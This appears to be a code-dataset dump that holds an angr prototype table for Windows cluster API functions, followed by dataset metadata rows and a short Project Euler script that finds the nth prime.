'ClusterNetInterfaceControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterface", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'GetClusterKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hCluster", "samDesired"]),
#
'GetClusterGroupKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hGroup", "samDesired"]),
#
'GetClusterResourceKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hResource", "samDesired"]),
#
'GetClusterNodeKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNode", "samDesired"]),
#
'GetClusterNetworkKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNetwork", "samDesired"]),
#
'GetClusterNetInterfaceKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNetInterface", "samDesired"]),
#
'ClusterRegCreateKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"nLength": SimTypeInt(signed=False, label="UInt32"), "lpSecurityDescriptor": SimTypePointer(SimTypeBottom(label="Void"), offset=0), "bInheritHandle": SimTypeInt(signed=True, label="Int32")}, name="SECURITY_ATTRIBUTES", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey", "dwOptions", "samDesired", "lpSecurityAttributes", "phkResult", "lpdwDisposition"]),
#
'ClusterRegOpenKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey", "samDesired", "phkResult"]),
#
'ClusterRegDeleteKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey"]),
#
'ClusterRegCloseKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey"]),
#
'ClusterRegEnumKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "dwIndex", "lpszName", "lpcchName", "lpftLastWriteTime"]),
#
'ClusterRegSetValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "lpszValueName", "dwType", "lpData", "cbData"]),
#
'ClusterRegDeleteValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "lpszValueName"]),
#
'ClusterRegQueryValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszValueName", "lpdwValueType", "lpData", "lpcbData"]),
#
'ClusterRegEnumValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "dwIndex", "lpszValueName", "lpcchValueName", "lpdwType", "lpData", "lpcbData"]),
#
'ClusterRegQueryInfoKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpcSubKeys", "lpcchMaxSubKeyLen", "lpcValues", "lpcchMaxValueNameLen", "lpcbMaxValueLen", "lpcbSecurityDescriptor", "lpftLastWriteTime"]),
#
'ClusterRegGetKeySecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Revision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "Control": SimTypeShort(signed=False, label="UInt16"), "Owner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Group": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Sacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0), "Dacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0)}, name="SECURITY_DESCRIPTOR", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "RequestedInformation", "pSecurityDescriptor", "lpcbSecurityDescriptor"]),
#
'ClusterRegSetKeySecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Revision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "Control": SimTypeShort(signed=False, label="UInt16"), "Owner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Group": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Sacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0), "Dacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0)}, name="SECURITY_DESCRIPTOR", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "SecurityInformation", "pSecurityDescriptor"]),
#
'ClusterRegSyncDatabase': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hCluster", "flags"]),
#
'ClusterRegCreateBatch': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "pHREGBATCH"]),
#
'ClusterRegBatchAddCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "dwCommand", "wzName", "dwOptions", "lpData", "cbData"]),
#
'ClusterRegCloseBatch': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "bCommit", "failedCommandNumber"]),
#
'ClusterRegCloseBatchEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "flags", "failedCommandNumber"]),
#
'ClusterRegBatchReadCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"Command": SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), "dwOptions": SimTypeInt(signed=False, label="UInt32"), "wzName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbData": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_BATCH_COMMAND", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotification", "pBatchCommand"]),
#
'ClusterRegBatchCloseNotification': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotification"]),
#
'ClusterRegCreateBatchNotifyPort': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "phBatchNotifyPort"]),
#
'ClusterRegCloseBatchNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotifyPort"]),
#
'ClusterRegGetBatchNotification': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotify", "phBatchNotification"]),
#
'ClusterRegCreateReadBatch': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "phRegReadBatch"]),
#
'ClusterRegReadBatchAddCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "wzSubkeyName", "wzValueName"]),
#
'ClusterRegCloseReadBatch': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "phRegReadBatchReply"]),
#
'ClusterRegCloseReadBatchEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "flags", "phRegReadBatchReply"]),
#
'ClusterRegReadBatchReplyNextCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"Command": SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), "dwOptions": SimTypeInt(signed=False, label="UInt32"), "wzSubkeyName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "wzValueName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbData": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_READ_BATCH_COMMAND", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatchReply", "pBatchCommand"]),
#
'ClusterRegCloseReadBatchReply': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatchReply"]),
#
'ClusterSetAccountAccess': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "szAccountSID", "dwAccess", "dwControlType"]),
#
'CreateCluster': SimTypeFunction([SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "lpszClusterName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cNodes": SimTypeInt(signed=False, label="UInt32"), "ppszNodeNames": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "cIpEntries": SimTypeInt(signed=False, label="UInt32"), "pIpEntries": SimTypePointer(SimStruct({"lpszIpAddress": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwPrefixLength": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_IP_ENTRY", pack=False, align=None), offset=0), "fEmptyCluster": SimTypeChar(label="Byte"), "managementPointType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_TYPE"), "managementPointResType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE")}, name="CREATE_CLUSTER_CONFIG", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["pConfig", "pfnProgressCallback", "pvCallbackArg"]),
#
'CreateClusterNameAccount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "lpszClusterName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "pszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "managementPointType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_TYPE"), "managementPointResType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), "bUpgradeVCOs": SimTypeChar(label="Byte")}, name="CREATE_CLUSTER_NAME_ACCOUNT", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pConfig", "pfnProgressCallback", "pvCallbackArg"]),
#
'RemoveClusterNameAccount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "bDeleteComputerObjects"]),
#
'DetermineCNOResTypeFromNodelist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["cNodes", "ppszNodeNames", "pCNOResType"]),
#
'DetermineCNOResTypeFromCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pCNOResType"]),
#
'DetermineClusterCloudTypeFromNodelist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_CLOUD_TYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["cNodes", "ppszNodeNames", "pCloudType"]),
#
'DetermineClusterCloudTypeFromCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_CLOUD_TYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pCloudType"]),
#
'GetNodeCloudTypeDW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["ppszNodeName", "NodeCloudType"]),
#
'RegisterClusterResourceTypeNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "hCluster", "Flags", "resTypeName", "dwNotifyKey"]),
#
'AddClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "pfnProgressCallback", "pvCallbackArg"]),
#
'AddClusterStorageNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNodeName", "pfnProgressCallback", "pvCallbackArg", "lpszClusterStorageNodeDescription", "lpszClusterStorageNodeLocation"]),
#
'RemoveClusterStorageNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszClusterStorageEnclosureName", "dwTimeout", "dwFlags"]),
#
'DestroyCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pfnProgressCallback", "pvCallbackArg", "fdeleteVirtualComputerObjects"]),
}
lib.set_prototypes(prototypes)
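Every entry above follows the same pattern: the exported symbol name maps to a SimTypeFunction built from its parameter types, its return type, and an arg_names list, and the finished dictionary is handed to lib.set_prototypes. A minimal, self-contained sketch of that pattern is shown below; the angr import paths and the SimLibrary / clusapi.dll wiring are assumptions based on how such definition files are usually structured, not something stated in this excerpt.

# Sketch only: the import locations below are assumed from angr's usual layout
# (angr.sim_type and angr.procedures.definitions) and may differ between versions.
from angr.sim_type import SimStruct, SimTypeFunction, SimTypeInt, SimTypePointer
from angr.procedures.definitions import SimLibrary

lib = SimLibrary()
lib.set_library_names("clusapi.dll")  # assumed target DLL for these cluster APIs

# Same shape as the 'GetClusterNetworkState' entry above: one HNETWORK handle in,
# an enum-sized unsigned integer out.
prototypes = {
    'GetClusterNetworkState': SimTypeFunction(
        [SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0)],
        SimTypeInt(signed=False, label="CLUSTER_NETWORK_STATE"),
        arg_names=["hNetwork"],
    ),
}

lib.set_prototypes(prototypes)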
| 200.777542
| 1,697
| 0.727753
| 9,465
| 94,767
| 7.216059
| 0.065082
| 0.064773
| 0.106354
| 0.165974
| 0.850102
| 0.840146
| 0.831801
| 0.820161
| 0.817745
| 0.811493
| 0
| 0.018433
| 0.088617
| 94,767
| 471
| 1,698
| 201.203822
| 0.77236
| 0.000295
| 0
| 0
| 0
| 0
| 0.23665
| 0.055872
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.008368
| 0.020921
| 0
| 0.020921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| ad6f31fc8b9fda7679e7a7e48d80154446654b0e
| 115
| py
| Python
| problems/0007/compute.py
| Dynortice/Project-Euler
| 99a0201b5d5f147eab77fc52d9db8995045cded0
| ["MIT"]
| null | null | null
| problems/0007/compute.py
| Dynortice/Project-Euler
| 99a0201b5d5f147eab77fc52d9db8995045cded0
| ["MIT"]
| null | null | null
| problems/0007/compute.py
| Dynortice/Project-Euler
| 99a0201b5d5f147eab77fc52d9db8995045cded0
| ["MIT"]
| null | null | null |
from euler.primes import prime_numbers

def compute(n: int) -> int:
    return list(prime_numbers(n * 20))[n - 1]
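Project Euler problem 7 asks for the 10 001st prime, so this helper is presumably invoked with n = 10001. A hedged usage sketch follows; it assumes euler.primes.prime_numbers, which lives elsewhere in the Dynortice/Project-Euler repository and is not part of this excerpt, yields at least n primes when bounded by n * 20.

# Usage sketch; repeats the tiny helper so it runs stand-alone, but euler.primes
# itself is an external assumption from the same repository.
from euler.primes import prime_numbers

def compute(n: int) -> int:
    return list(prime_numbers(n * 20))[n - 1]

if __name__ == "__main__":
    print(compute(6))      # 13, the worked example given in the problem statement
    print(compute(10001))  # the 10 001st prime, which is what problem 7 asks for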
| 19.166667
| 45
| 0.686957
| 19
| 115
| 4.052632
| 0.736842
| 0.311688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.182609
| 115
| 5
| 46
| 23
| 0.787234
| 0
| 0
